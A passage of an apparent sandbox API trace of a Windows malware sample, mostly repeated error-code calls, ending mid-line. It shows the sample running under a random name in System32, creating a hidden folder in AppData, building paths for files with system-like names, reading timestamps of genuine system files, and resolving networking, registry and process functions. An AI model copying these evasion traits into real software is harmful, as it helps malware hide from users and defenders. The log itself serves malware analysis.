(dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.566] SetLastError (dwErrCode=0x0) [0035.566] GetLastError () returned 0x0 [0035.567] SetLastError (dwErrCode=0x0) [0035.567] GetLastError () returned 0x0 [0035.567] SetLastError (dwErrCode=0x0) [0035.567] GetLastError () returned 0x0 [0035.567] SetLastError (dwErrCode=0x0) [0035.567] GetLastError () returned 0x0 [0035.567] SetLastError (dwErrCode=0x0) [0035.567] GetLastError () returned 0x0 [0035.567] SetLastError (dwErrCode=0x0) [0035.567] GetLastError () returned 0x0 [0035.567] SetLastError (dwErrCode=0x0) [0035.567] GetLastError () returned 0x0 [0035.567] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.578] SetLastError (dwErrCode=0x0) [0035.578] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.579] SetLastError (dwErrCode=0x0) [0035.579] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.580] SetLastError (dwErrCode=0x0) [0035.580] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.581] SetLastError (dwErrCode=0x0) [0035.581] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.582] SetLastError (dwErrCode=0x0) [0035.582] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.583] GetLastError () returned 0x0 [0035.583] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.584] GetLastError () returned 0x0 [0035.584] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.585] SetLastError (dwErrCode=0x0) [0035.585] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.586] GetLastError () returned 0x0 [0035.586] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.587] SetLastError (dwErrCode=0x0) [0035.587] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.588] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.588] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.588] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.588] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.588] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.588] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.588] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.588] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.588] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.588] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.588] GetLastError () returned 0x0 [0035.588] SetLastError (dwErrCode=0x0) [0035.589] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.589] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.589] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.590] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f650 | out: lpSystemTimeAsFileTime=0x18f650*(dwLowDateTime=0xe2e628d0, dwHighDateTime=0x1d3dfba)) [0035.590] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f588, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.590] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f470, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.590] GetLastError () returned 0x0 [0035.591] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.591] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.591] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.591] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.591] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.591] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.591] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.591] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.591] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.591] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.591] GetLastError () returned 0xb7 [0035.591] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.591] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.591] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.591] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.591] wsprintfA (in: param_1=0x18f2f0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.591] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.591] wsprintfA (in: param_1=0x18f1ec, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.591] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.592] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.592] CloseHandle (hObject=0x74) returned 1 [0035.592] GetLastError () returned 0x0 [0035.592] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.592] GetLastError () returned 0x0 [0035.592] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.592] GetSystemDirectoryA (in: lpBuffer=0x18f2f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.592] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.592] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.592] CloseHandle (hObject=0x74) returned 1 [0035.592] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.592] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.592] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.594] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.594] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.594] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.594] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.594] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.594] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0035.594] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.594] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.594] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.594] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0035.594] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.594] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.594] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.594] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.594] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.594] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.594] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.595] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.596] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.596] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.596] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.596] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.596] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.596] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.596] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.597] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.597] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.597] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.597] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: 